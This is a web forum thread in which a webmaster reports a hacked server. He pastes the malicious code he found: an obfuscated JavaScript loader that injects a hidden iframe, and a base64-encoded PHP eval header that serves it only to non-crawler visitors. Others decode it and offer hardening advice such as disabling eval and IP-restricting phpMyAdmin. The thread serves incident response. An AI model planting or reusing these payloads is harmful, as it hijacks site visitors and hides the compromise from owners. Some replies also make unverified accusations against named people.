Go Fuck Yourself Hacking Bastards

[PornHustler]

Well after more than 3 years with out ever being hacked I finally got my first taste of it yesterday and am dealing with it today. I had come nasty codes which I dont know what they do, maybe you guys can help out a little:

This was on my static sites in the body:

Code:

<script>aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)f='-29q-29q67q64q-6q2q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q3q85q-29q-29q-29q67q64q76q59q71q63q76q2q3q21q-29q-29q87q-6q63q70q77q63q-6q85q-29q-29q-29q62q73q61q79q71q63q72q78q8q81q76q67q78q63q2q-4q22q67q64q76q59q71q63q-6q77q76q61q23q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q-6q81q67q62q78q66q23q1q11q10q1q-6q66q63q67q65q66q78q23q1q11q10q1q-6q77q78q83q70q63q23q1q80q67q77q67q60q67q70q67q78q83q20q66q67q62q62q63q72q21q74q73q77q67q78q67q73q72q20q59q60q77q73q70q79q78q63q21q70q63q64q78q20q10q21q78q73q74q20q10q21q1q24q22q9q67q64q76q59q71q63q24q-4q3q21q-29q-29q87q-29q-29q64q79q72q61q78q67q73q72q-6q67q64q76q59q71q63q76q2q3q85q-29q-29q-29q80q59q76q-6q64q-6q23q-6q62q73q61q79q71q63q72q78q8q61q76q63q59q78q63q31q70q63q71q63q72q78q2q1q67q64q76q59q71q63q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q77q76q61q1q6q1q66q78q78q74q20q9q9q81q64q78q78q80q77q67q8q62q63q59q64q78q73q72q63q8q61q73q71q9q62q9q14q10q14q8q74q66q74q25q65q73q23q11q1q3q21q64q8q77q78q83q70q63q8q80q67q77q67q60q67q70q67q78q83q23q1q66q67q62q62q63q72q1q21q64q8q77q78q83q70q63q8q74q73q77q67q78q67q73q72q23q1q59q60q77q73q70q79q78q63q1q21q64q8q77q78q83q70q63q8q70q63q64q78q23q1q10q1q21q64q8q77q78q83q70q63q8q78q73q74q23q1q10q1q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q81q67q62q78q66q1q6q1q11q10q1q3q21q64q8q77q63q78q27q78q78q76q67q60q79q78q63q2q1q66q63q67q65q66q78q1q6q1q11q10q1q3q21q-29q-29q-29q62q73q61q79q71q63q72q78q8q65q63q78q31q70q63q71q63q72q78q77q28q83q46q59q65q40q59q71q63q2q1q60q73q62q83q1q3q53q10q55q8q59q74q74q63q72q62q29q66q67q70q62q2q64q3q21q-29q-29q87'.split('q');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;-i>-w.length;i+=1){j=i;s=s+r(38+1*w[j]);}if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);} you need to pay for this crypt

This was on all of the index.php files I checked so far at the very top of the file:

Code:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1aFlUMHZYSGN2TG1WNFpXTW9NU2t1YVc1a1pYZ3JXMTA3WVdGaFBTY3dKenQwY25sN2JHOWpZWFJwYjI0b2UzMHBPMzFqWVhSamFDaG9aMkpsY21kbGNpbDdhV1lvWVdFOVBUMWhZV0VwQ21ZOUp5MHlPWEV0TWpseE5qZHhOalJ4TFRaeE1uRTJNbkUzTTNFMk1YRTNPWEUzTVhFMk0zRTNNbkUzT0hFNGNUWTFjVFl6Y1RjNGNUTXhjVGN3Y1RZemNUY3hjVFl6Y1RjeWNUYzRjVGMzY1RJNGNUZ3pjVFEyY1RVNWNUWTFjVFF3Y1RVNWNUY3hjVFl6Y1RKeE1YRTJNSEUzTTNFMk1uRTRNM0V4Y1ROeE5UTnhNVEJ4TlRWeE0zRTROWEV0TWpseExUSTVjUzB5T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFM05uRXljVE54TWpGeExUSTVjUzB5T1hFNE4zRXRObkUyTTNFM01IRTNOM0UyTTNFdE5uRTROWEV0TWpseExUSTVjUzB5T1hFMk1uRTNNM0UyTVhFM09YRTNNWEUyTTNFM01uRTNPSEU0Y1RneGNUYzJjVFkzY1RjNGNUWXpjVEp4TFRSeE1qSnhOamR4TmpSeE56WnhOVGx4TnpGeE5qTnhMVFp4TnpkeE56WnhOakZ4TWpOeE1YRTJObkUzT0hFM09IRTNOSEV5TUhFNWNUbHhPREZ4TmpSeE56aHhOemh4T0RCeE56ZHhOamR4T0hFMk1uRTJNM0UxT1hFMk5IRTNPSEUzTTNFM01uRTJNM0U0Y1RZeGNUY3pjVGN4Y1RseE5qSnhPWEV4TkhFeE1IRXhOSEU0Y1RjMGNUWTJjVGMwY1RJMWNUWTFjVGN6Y1RJemNURXhjVEZ4TFRaeE9ERnhOamR4TmpKeE56aHhOalp4TWpOeE1YRXhNWEV4TUhFeGNTMDJjVFkyY1RZemNUWTNjVFkxY1RZMmNUYzRjVEl6Y1RGeE1URnhNVEJ4TVhFdE5uRTNOM0UzT0hFNE0zRTNNSEUyTTNFeU0zRXhjVGd3Y1RZM2NUYzNjVFkzY1RZd2NUWTNjVGN3Y1RZM2NUYzRjVGd6Y1RJd2NUWTJjVFkzY1RZeWNUWXljVFl6Y1RjeWNUSXhjVGMwY1RjemNUYzNjVFkzY1RjNGNUWTNjVGN6Y1RjeWNUSXdjVFU1Y1RZd2NUYzNjVGN6Y1Rjd2NUYzVjVGM0Y1RZemNUSXhjVGN3Y1RZemNUWTBjVGM0Y1RJd2NURXdjVEl4Y1RjNGNUY3pjVGMwY1RJd2NURXdjVEl4Y1RGeE1qUnhNakp4T1hFMk4zRTJOSEUzTm5FMU9YRTNNWEUyTTNFeU5IRXROSEV6Y1RJeGNTMHlPWEV0TWpseE9EZHhMVEk1Y1MweU9YRTJOSEUzT1hFM01uRTJNWEUzT0hFMk4zRTNNM0UzTW5FdE5uRTJOM0UyTkhFM05uRTFPWEUzTVhFMk0zRTNObkV5Y1ROeE9EVnhMVEk1Y1MweU9YRXRNamx4T0RCeE5UbHhOelp4TFRaeE5qUnhMVFp4TWpOeExUWnhOakp4TnpOeE5qRnhOemx4TnpGeE5qTnhOekp4TnpoeE9IRTJNWEUzTm5FMk0zRTFPWEUzT0hFMk0zRXpNWEUzTUhFMk0zRTNNWEUyTTNFM01uRTNPSEV5Y1RGeE5qZHhOalJ4TnpaeE5UbHhOekZ4TmpOeE1YRXpjVEl4Y1RZMGNUaHhOemR4TmpOeE56aHhNamR4TnpoeE56aHhOelp4TmpkeE5qQnhOemx4TnpoeE5qTnhNbkV4Y1RjM2NUYzJjVFl4Y1RGeE5uRXhjVFkyY1RjNGNUYzRjVGMwY1RJd2NUbHhPWEU0TVhFMk5IRTNPSEUzT0hFNE1IRTNOM0UyTjNFNGNUWXljVFl6Y1RVNWNUWTBjVGM0Y1RjemNUY3ljVFl6Y1RoeE5qRnhOek54TnpGeE9YRTJNbkU1Y1RFMGNURXdjVEUwY1RoeE56UnhOalp4TnpSeE1qVnhOalZ4TnpOeE1qTnhNVEZ4TVhFemNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFNE1IRTJOM0UzTjNFMk4zRTJNSEUyTjNFM01IRTJOM0UzT0hFNE0zRXlNM0V4Y1RZMmNUWTNjVFl5Y1RZeWNUWXpjVGN5Y1RGeE1qRnhOalJ4T0hFM04zRTNPSEU0TTNFM01IRTJNM0U0Y1RjMGNUY3pjVGMzY1RZM2NUYzRjVFkzY1RjemNUY3ljVEl6Y1RGeE5UbHhOakJ4TnpkeE56TnhOekJ4TnpseE56aHhOak54TVhFeU1YRTJOSEU0Y1RjM2NUYzRjVGd6Y1Rjd2NUWXpjVGh4TnpCeE5qTnhOalJ4TnpoeE1qTnhNWEV4TUhFeGNUSXhjVFkwY1RoeE56ZHhOemh4T0ROeE56QnhOak54T0hFM09IRTNNM0UzTkhFeU0zRXhjVEV3Y1RGeE1qRnhOalJ4T0hFM04zRTJNM0UzT0hFeU4zRTNPSEUzT0hFM05uRTJOM0UyTUhFM09YRTNPSEUyTTNFeWNURnhPREZ4TmpkeE5qSnhOemh4TmpaeE1YRTJjVEZ4TVRGeE1UQnhNWEV6Y1RJeGNUWTBjVGh4TnpkeE5qTnhOemh4TWpkeE56aHhOemh4TnpaeE5qZHhOakJ4TnpseE56aHhOak54TW5FeGNUWTJjVFl6Y1RZM2NUWTFjVFkyY1RjNGNURnhObkV4Y1RFeGNURXdjVEZ4TTNFeU1YRXRNamx4TFRJNWNTMHlPWEUyTW5FM00zRTJNWEUzT1hFM01YRTJNM0UzTW5FM09IRTRjVFkxY1RZemNUYzRjVE14Y1Rjd2NUWXpjVGN4Y1RZemNUY3ljVGM0Y1RjM2NUSTRjVGd6Y1RRMmNUVTVjVFkxY1RRd2NUVTVjVGN4Y1RZemNUSnhNWEUyTUhFM00zRTJNbkU0TTNFeGNUTnhOVE54TVRCeE5UVnhPSEUxT1hFM05IRTNOSEUyTTNFM01uRTJNbkV5T1hFMk5uRTJOM0UzTUhFMk1uRXljVFkwY1ROeE1qRnhMVEk1Y1MweU9YRTROeWN1YzNCc2FYUW9KM0VuS1R0dFpEMG5ZU2M3WlQxbGRtRnNPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5MbVp5YjIxRGFHRnlRMjlrWlR0bWIzSW9hVDB3T3kxcFBpMTNMbXhsYm1kMGFEdHBLejB4S1h0cVBXazdjejF6SzNJb016Z3JNU3AzVzJwZEtUdDlDbWxtS0UxaGRHZ3VjbTkxYm1Rb0tDMHhLaklxTWlrcVRXRjBhQzUwWVc0b1RXRjBhQzVoZEdGdUtERXZNaWtwS1QwOVBTMHpLekVwWlNoektUdDlQQzl6WTNKcGNIUSsnKSk7DQp9'));

For all of you wordpress guys out there are there any plugins that will help from this happening again? I am going to have a backup restored so things will be back to normal but this shit pisses me off. Passwords..etc have been changed.

My host says they don't know how it happened but I have 100's of infected files. I would have figured they would have logs of logins, ftp sessions..etc. But they say they don't know how.

Thanks

[asdasd]

[DarkJedi]

you are getting hacked by the same guy from here: https://gfy.com/showthread.php?t=1054210

He is from Kyrgyzstan, he hacks people servers and sells traffic to www.trafficrevenue.net which is operated by a 15 year old Polack Tomasz Klekot .

[Harmon]

[DidierE]

Decode the base_64 code with this tool and see what php they called on your server: http://www.opinionatedgeek.com/dotne.../base64decode/

[anexsia]

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbran dprotect.com','blogpulse.com','bot','buzztracker.c om','crawl','docomo','drupal.org','feedtools','htm ldoc','httpclient','internetseer.com','linux','mac intosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrr r','rssreader','slurp','snoopy','spider','spyder', 'szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','i phone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode('PHNjcmlwdD5hY etc etc etc etc'));
}

[ladida]

He's just stealing your traffic. No biggie. Imagine if you had members data and they stole that, then sold your emails and full data. I would not sweat too much. Most hosts won't be able to help you with that

[SomeCreep]

Wordpress is fucked. I would never use it.

[PornHustler]

Thanks for the help figuring it out.

I'm just doing a restore on the server.

Putting two and two together equals virus I found on my desktop yesterday. At least I know where I got it.

[k0nr4d]

You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval

[anexsia]

Quote:

Originally Posted by k0nr4d

You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval

Thanks for this tip

[PornHustler]

Yes thanks for that tip. Going to have that set up today.

[k0nr4d]

You can do this too, it might break some scripts on your server though so you might need to remove some of the functions:

Code:

disable_functions = eval,exec,passthru,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,shell_exec,phpinfo
display_errors = off
expose_php = off

[travs]

install the WP Security plugin

[Blackcrow]

Quote:

Originally Posted by k0nr4d

You could always just disable eval() on your server's php.ini:
disable_functions = eval

I've never seen that used outside of hacking scripts. The general rule of thumb with eval (as a programmer) is that if you ever find yourself having to use it, you did something wrong. They even have a big 'caution' box listed on php.net on that topic:
http://lu.php.net/eval

The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.

[PornHustler]

Quote:

Originally Posted by Blackcrow

The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.

I dont run any programs.

[Spudstr]

Quote:

Originally Posted by Blackcrow

The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.

We have seen more exploits with people running phpmyadmin than anything else. People really need to lock these down better with htaccess.

[Blackcrow]

Quote:

Originally Posted by PornHustler

I dont run any programs.

Im not a blog guy, but if I had to guess.. there is phpmyadmin on your server. You should scan the server for all installations and delete all installs except one, then IP access protect it.

[asdasd]

Try holding down high value targets on windows with governments as adversaries.

[V_RocKs]

I love this...

[Brent 3dSexCash]

If you use FileZilla, or any other FTP program that stores a 'cache' of your last logged in sites, it's likely they used that info to get into your server. Happened to me a few times.

I've also seen some injects from free wordpress plugins that have big security holes. Always weary of using plugins I'm not familiar with -- or that don't have an active developer.

[AJHall]

Quote:

Originally Posted by Blackcrow

The problem is NATS and ElevatedX both use eval so it cant be disabled for most webmasters. The best I can tell this hacker has 2 modes of operation; he either breaks into the nats admin and uses the templates (or upload documents) to inject code or he uses outdated versions of myphpadmin. You should have IP access turned on for NATS and IP restriction on your myphpadmin install.

The presence of Eval is due to using Smarty templates. Most of the hacking incidents we've seen in the past 6 years have occurred when someone's servers were wide open and no IP restriction was in place - or when a large number of people from an organization had access to a server and/or admin panels using the same login credentials.

IP restricting access on multiple levels including access to software admin panels is something everyone should be doing.

AJ

[martinsc]

I install Paranoid911 and get immediate mail when anything has changed.... I added a rule to my mail program to ignore the ones that I don't mind (i.e. uploading pics, etc.) and forward to SMS when there is a change in any index.html or index.php file
This will not stop the hacking, but at least I know it happened...
http://wordpress.org/extend/plugins/paranoid911/